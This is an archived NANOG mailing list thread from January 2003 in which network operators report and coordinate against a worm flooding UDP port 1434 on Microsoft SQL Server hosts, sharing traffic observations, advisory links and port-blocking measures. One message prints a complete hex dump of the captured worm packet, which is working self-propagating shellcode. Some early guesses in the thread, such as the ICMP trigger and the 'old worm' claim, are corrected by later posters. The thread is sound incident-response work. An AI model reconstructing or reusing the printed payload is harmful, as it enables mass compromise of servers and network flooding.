It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
This may well be the exploit being used: http://www.nextgenss.com/advisories/mssql-udp.txt --Lloyd On Sat, 25 Jan 2003, Dave Stewart wrote:
Date: Sat, 25 Jan 2003 01:50:03 -0500 From: Dave Stewart <dbs@dbscom.com> To: nanog@merit.edu Subject: Re: New worm / port 1434?
At 01:32 AM 1/25/2003, you wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Agreed... shutting down MSSQL stopped the flood here.... now to find it and remove it
* Avleen Vig <lists-nanog@silverwraith.com> [20030124 22:44]:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
A preliminary look at some of our NetFlow data shows a suspect ICMP payload delivered to one of our downstream colo customer boxes followed by a 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random destinations on 1434/udp. This customer typically does about 0.250 Mbit/s so this was a bit out of their profile. :-) Needless to say, we shut them down per a suspected security incident. The ICMP came from 66.214.194.31 though that could quite easily be forged or just another compromised box. We're seeing red to many networks all over the world though our network seems to have quieted down a bit. Sounds like a DDoS in the works. Anyone else able to corroborate/compare notes? -jr ---- Josh Richards <jrichard@{ geekresearch.com, cubicle.net, digitalwest.net }> Geek Research, LLC - Digital West Networks, Inc - San Luis Obispo, CA KG6CYK - IP/Unix/telecom/knowledge/coffee/security/crypto/business/geek
### On Fri, 24 Jan 2003 22:59:17 -0800, Josh Richards <jrichard@cubicle.net> ### casually decided to expound upon nanog@nanog.org the following thoughts ### about "Re: New worm / port 1434?": JR> * Avleen Vig <lists-nanog@silverwraith.com> [20030124 22:44]: JR> > JR> > It seems we have a new worm hitting Microsoft SQL server servers on port JR> > 1434. JR> JR> A preliminary look at some of our NetFlow data shows a suspect ICMP payload JR> delivered to one of our downstream colo customer boxes followed by a JR> 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random JR> destinations on 1434/udp. This customer typically does about 0.250 Mbit/s JR> so this was a bit out of their profile. :-) Needless to say, we shut them JR> down per a suspected security incident. The ICMP came from 66.214.194.31 JR> though that could quite easily be forged or just another compromised box. JR> We're seeing red to many networks all over the world though our network seems JR> to have quieted down a bit. Sounds like a DDoS in the works. JR> JR> Anyone else able to corroborate/compare notes? First attack packet came in around 2130PST. A tcpdump reveals this: Jan 25 00:05:49.880553 64.159.86.99.2321 > 66.166.158.240.1434: [udp sum ok] udp 376 (ttl 120, id 53207) 0000: 4500 0194 cfd7 0000 7811 f8e8 409f 5663 E...Ï×..x.øè@.Vc 0010: 42a6 9ef0 0911 059a 0180 b3a1 0401 0101 B¦.ð......³¡.... 0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ° 0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p® 0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸. 00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P 00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke 00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe 00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2 00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ 00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔPÿ. 0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðPÿ.P¾..® 0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..® 0120: 42ff 16ff d031 c951 5150 81f1 0301 049b Bÿ.ÿÐ1ÉQQP.ñ.... 0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀPÿ 0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j.ÿÐP.EÄP.E 0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀPÿ..Æ.Û.ó<aÙÿ.E 0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.) 0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1 0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P 0190: ffd6 ebca ÿÖëÊ -- /*===================[ Jake Khuon <khuon@NEEBU.Net> ]======================+ | Packet Plumber, Network Engineers /| / [~ [~ |) | | --------------- | | for Effective Bandwidth Utilisation / |/ [_ [_ |) |_| N E T W O R K S | +=========================================================================*/
Note, further analysis makes me believe that the ICMP we saw immediately beforehand was a coincidence and unrelated. The origin of the ICMP has been traced to a customer application. -jr * Josh Richards <jrichard@cubicle.net> [20030125 00:21]:
A preliminary look at some of our NetFlow data shows a suspect ICMP payload delivered to one of our downstream colo customer boxes followed by a 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random destinations on 1434/udp. This customer typically does about 0.250 Mbit/s so this was a bit out of their profile. :-) Needless to say, we shut them down per a suspected security incident. The ICMP came from 66.214.194.31 though that could quite easily be forged or just another compromised box. We're seeing red to many networks all over the world though our network seems to have quieted down a bit. Sounds like a DDoS in the works.
Anyone else able to corroborate/compare notes?
---- Josh Richards <jrichard@{ geekresearch.com, cubicle.net, digitalwest.net }> Geek Research, LLC - Digital West Networks, Inc - San Luis Obispo, CA KG6CYK - IP/Unix/telecom/knowledge/coffee/security/crypto/business/geek
Duplicated info.. But this is an old worm ;-( http://www.cert.org/advisories/CA-1996-01.html Pete Ashdown wrote:
* Avleen Vig (lists-nanog@silverwraith.com) [030124 23:50] writeth:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Affirmative. Be sure to block 1434 UDP on both the inbound and the outbound. Infected servers are VERY NOISY.
-- ____________________________________________________ Message scanned for viruses and dangerous content by <http://www.newnet.co.uk/av/> and believed to be clean
On Sat, Jan 25, 2003 at 08:05:33AM +0000, Gary Coates wrote:
Duplicated info.. But this is an old worm ;-(
This is not the worm that's spreading now. Greetz, Peter -- peter@dataloss.nl | http://www.dataloss.nl/ | Undernet:#clue
We had to go through each VLAN to determine which boxes were compromised, looks like W2K SQL. This thing is spreading fast. -D 0. Pete Ashdown <pashdown@xmission.com> farted:
* Avleen Vig (lists-nanog@silverwraith.com) [030124 23:50] writeth:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Affirmative. Be sure to block 1434 UDP on both the inbound and the outbound. Infected servers are VERY NOISY.
-- -------------- http://www.zeromemory.com - metal for your ears.
Yes, I am seeing this big time. Are you sure its SQL server ? Thats normally 1433 no ? Are there any other details somewhere about this ? At 10:32 PM 1/24/2003 -0800, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
-------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike
From: "Mike Tancsa"
Yes, I am seeing this big time. Are you sure its SQL server ? Thats normally 1433 no ? Are there any other details somewhere about this ?
<snip> All MS SQL servers listen to 1434 reguardless of the other ports they listen on. Depending on configuration depends on what other ports it uses (due to various security models), but 1434 is a constant in all configurations according to a quick search and a read on the last MS SQL vulnerability found in 7/2002. Jack Bates BrightNet Oklahoma
At 02:45 AM 1/25/2003 -0600, Jack Bates wrote:
From: "Mike Tancsa"
Yes, I am seeing this big time. Are you sure its SQL server ? Thats normally 1433 no ? Are there any other details somewhere about this ?
<snip>
All MS SQL servers listen to 1434 reguardless of the other ports they listen on. Depending on configuration depends on what other ports it uses (due to various security models), but 1434 is a constant in all configurations according to a quick search and a read on the last MS SQL vulnerability found in 7/2002.
Thanks, I have blocked the infected hosts in my customer colo space. Its an eye opener how much traffic they generate on the local collision domain they are on :-( ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike
1434 is the SQL Server Resolution Service. Unfortunately, this appears to be a whole new thing, I was unable to find anything more recent then May of 2002 about security issues with this port. Thanks, Adam Debus Network Administrator, ReachONE Internet adam@reachone.com ----- Original Message ----- From: "Mike Tancsa" <mike@sentex.net> To: "Avleen Vig" <lists-nanog@silverwraith.com> Cc: <nanog@nanog.org> Sent: Friday, January 24, 2003 11:19 PM Subject: Re: New worm / port 1434?
Yes, I am seeing this big time. Are you sure its SQL server ? Thats normally 1433 no ? Are there any other details somewhere about this ?
At 10:32 PM 1/24/2003 -0800, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
-------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike
On Sat Jan 25, 2003 at 02:19:04AM -0500, Mike Tancsa wrote:
Yes, I am seeing this big time. Are you sure its SQL server ? Thats normally 1433 no ? Are there any other details somewhere about this ?
This URL seems to explain the exploit: http://www.nextgenss.com/advisories/mssql-udp.txt Simon -- Simon Lockhart | Tel: +44 (0)1628 407720 (BBC ext 37720) Technology Manager | Fax: +44 (0)1628 407701 (BBC ext 37701) BBC Internet Services | Email: Simon.Lockhart@bbc.co.uk BBC Technology, Maiden House, Vanwall Road, Maidenhead. SL6 4UB. UK
http://securityresponse.symantec.com/avcenter/venc/data/w32.sqlexp.wor m.html ----- Original Message ----- From: "Simon Lockhart" <simonl@rd.bbc.co.uk> To: "Mike Tancsa" <mike@sentex.net> Cc: "Avleen Vig" <lists-nanog@silverwraith.com>; <nanog@nanog.org> Sent: Saturday, January 25, 2003 3:48 AM Subject: Re: New worm / port 1434?
On Sat Jan 25, 2003 at 02:19:04AM -0500, Mike Tancsa wrote:
Yes, I am seeing this big time. Are you sure its SQL server ?
normally 1433 no ? Are there any other details somewhere about
Thats this ?
This URL seems to explain the exploit:
http://www.nextgenss.com/advisories/mssql-udp.txt
Simon -- Simon Lockhart | Tel: +44 (0)1628 407720 (BBC ext
Technology Manager | Fax: +44 (0)1628 407701 (BBC ext
37720) 37701)
BBC Internet Services | Email: Simon.Lockhart@bbc.co.uk BBC Technology, Maiden House, Vanwall Road, Maidenhead. SL6 4UB. UK
Anyone else dealing with this tonight? Its kind of nasty -Scotty ----- Original Message ----- From: "Avleen Vig" <lists-nanog@silverwraith.com> To: <nanog@nanog.org> Sent: Saturday, January 25, 2003 1:32 AM Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Anyone else dealing with this tonight? Its kind of nasty
Its very nasty, and it happened at the worse time after 17:00 GMT so contacting customers hasn't been easy. We've deployed filters on systems that are under attack and continue to monitor the sitation, its caused lots of DNS issues with people using MS SQL as a DNS backend. Regards, Neil
Yep - we are seeing 3 compromised SQL boxes right now. Mark Radabaugh Amplex (419) 720-3635 ----- Original Message ----- From: "Avleen Vig" <lists-nanog@silverwraith.com> To: <nanog@nanog.org> Sent: Saturday, January 25, 2003 1:32 AM Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
I'm seeing obscene amounts of 1434/udp traffic at my transit and peering points. I've filtered it out in both directions everywhere my network touches the outside world. It's almost 20% of my traffic at this point. I think I've calmed the internal storm so far, but we'll see. I saw refence to an ICMP "trigger" packet. Is there any info on this and is it possible to filter for it w/o killing all ICMP traffic? It'd be nice to know I won't have any more routers or switches fall over tonight. Colo customers seem to be the worst off, the rate limiting kills the router or the traffic kills the backbone. decisions, decisions... -S -- Scott Call Router Geek, ATGi, home of $6.95 Prime Rib "Nothing is less productive than to make more efficient what should not be done at all." -Peter Drucker
We detected this traffic and blocked it. It was more wide-spread within our network than the usual DDoS attacks we see. Curious to hear how significant this one is or will be. On Fri, 24 Jan 2003, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434. On Fri, 24 Jan 2003, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
+----------------- H U R R I C A N E - E L E C T R I C -----------------+ | Mike Leber Direct Internet Connections Voice 510 580 4100 | | Hurricane Electric Web Hosting Colocation Fax 510 580 4151 | | mleber@he.net http://www.he.net | +-----------------------------------------------------------------------+
On Sat, Jan 25, 2003 at 12:12:37AM -0800, Mike Leber wrote:
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434.
USD10 to the first person who spots a CNN reporter speculating to Saddam's involvement.
On Sat, 25 Jan 2003, Avleen Vig wrote:
On Sat, Jan 25, 2003 at 12:12:37AM -0800, Mike Leber wrote:
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434.
USD10 to the first person who spots a CNN reporter speculating to Saddam's involvement.
I didnt realise he was such a computer expert!
We were hit hard by this as well. It appears to be a buffer overflow exploit, as blocking the ports on my router and restarting MS SQL put a stop to it. Thanks, Adam Debus Network Administrator, ReachONE Internet adam@reachone.com ----- Original Message ----- From: "Avleen Vig" <lists-nanog@silverwraith.com> To: <nanog@nanog.org> Sent: Friday, January 24, 2003 10:32 PM Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
participants (22)
-
Adam "Tauvix" Debus -
Avleen Vig -
Curtis Maurand -
Dave Stewart -
Dr. Mosh -
Gary Coates -
Jack Bates -
Jake Khuon -
Josh Richards -
K. Scott Bethke -
Len Rose -
Lloyd Taylor -
Mark Radabaugh -
Mike Leber -
Mike Tancsa -
neil@DOMINO.ORG -
Pete Ashdown -
Peter van Dijk -
Scott Call -
Simon Lockhart -
Stephen J. Wilcox -
Troy Rader